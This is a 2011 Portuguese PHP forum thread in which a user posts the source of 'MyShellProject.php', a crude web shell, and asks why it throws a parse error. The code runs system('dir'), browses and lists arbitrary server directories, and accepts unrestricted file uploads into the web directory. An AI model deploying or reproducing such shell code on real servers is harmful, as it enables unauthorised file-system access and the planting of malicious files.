gfreitas 0 Denunciar post Postado Outubro 8, 2011 Nao consigo achar o erro no codigo a seguir <html> <body> <p>This is the directory of this page:<br> <?php // Start of the script of the show of the directory of the shell $Dir_name = $_SERVER['SCRIPT_FILENAME']; echo $Dir_name; ?><br> ---------------------------------------------------<br> <?php if (isset($_GET['command1fuser'])){ $com1 = $_GET['command1fuser']; $com12 = $com1; echo $com12; }?> <form action="MyShellProject.php" method="get"> --------------------------------------------------- <br>You can write command to execute !<br> <input type="text" name="command1fuser"><br> <input type="submit" value="Do it !"> </form> <!--Start of folders menu !--> <br>--------------------------------------------------<br> <b>Folders Menu:<br></b> <?php if (isset($_GET['DirwoRk'])) { $DirwoRk = $_GET['DirwoRk']; if ($DirwoRk == 1){ chdir('../');echo '<br>'; echo 'You changed to one directory back !';echo '<br>'; system('dir'); }elseif($_GET['DirwoRk'] != 1){ $DirwoRk = $_GET['DirwoRk']; $i = 1; while ($i <=$DirwoRk ) { chdir('../'); $i++; } echo '<br>';system('dir'); echo '<br>'; echo 'Changed to '.$DirwoRk.' folder back! !';echo '<br>'; }} ?></center><center> <a href="MyShellProject.php?DirwoRk=<?php if (isset($_GET['DirwoRk'])) { $DirwoRk = $_GET['DirwoRk']; $DirwoRk2 = $DirwoRk + 1; echo $DirwoRk2; }else{ echo 1;}?>"> Return! </a> <p><br> To open a folder type the name here:<br> <form action="MyShellProject.php" method="get"> <input type="text" name="openfolder" id="openfolder"> <input type="submit" value="Open for me !"> <br> <!--End of the script of the menu--> ---------------------------------------------------<br> Dir<br> <?php echo getcwd(); $var2 = system('dir'); $var4 = '"'.$var2.'"'; ?></center><center> <?php // ----------------------------------------------------------- // Start of the script of upload ! if(isset($_FILES['upload'])){ if (move_uploaded_file($_FILES["upload"]["tmp_name"], $_FILES["upload"]["name"])){; echo '<script type="text/javascript"> alert("Uploaded!!") </script>';}else{ echo '<script type="text/javascript"> alert ("Ocurred an error on upload !") </script>'; } } ?> <br> -------------------------------------<br> Upload ? <br> <form enctype="multipart/form-data" action="MyShellProject.php" method="post"> <input type="file" name="upload" id="upload"><br> <input type="submit" value="Enviar arquivo" > </form><br> <!--End of the script of upload !! <----- --> <!--Start of Scandir scrpt--> -------------------------------------<br> ScanDir ? <form action='MyShellProject.php' method='get'> <input type='text' name="Scandirform"><br> <input type="submit" value="Scan Directory"> </form> <?php if (isset($_GET['Scandirform'])){ $var1 = $_GET['Scandirform']; $var3 = scandir($var1); print_r ($var3);} ?> <!--End of the script of Scandir--> </center> </body> </html> Compartilhar este post Link para o post Compartilhar em outros sites
Henrique Barcelos 290 Denunciar post Postado Outubro 9, 2011 Que erro que aparece? Em que linha? Colocar o código dentro de um bloco " " também ajuda Compartilhar este post Link para o post Compartilhar em outros sites
Andrey Knupp Vital 136 Denunciar post Postado Outubro 9, 2011 Bem Vindo ao fórum .. Por favor, leia o seguinte tópico antes de postar :seta: http://forum.imasters.com.br/index.php?app=core&module=help Deixando claro o motivo da indicação da leitura: 'Não use palavras do tipo por favor, ajudem, dúvida' no título e descrição do seu tópico .. assim você ajuda agente a te ajudar e mantém o fórum organizado. ;) Compartilhar este post Link para o post Compartilhar em outros sites
gfreitas 0 Denunciar post Postado Outubro 9, 2011 Minhas sinceras desculpas meu caro Andrey Knupp ! Rick.hjpbarcelos :Então cara, aparece o seguinte : ( ! ) Parse error: syntax error, unexpected $end in ...\MyShellProject.php on line 121 vlw! Compartilhar este post Link para o post Compartilhar em outros sites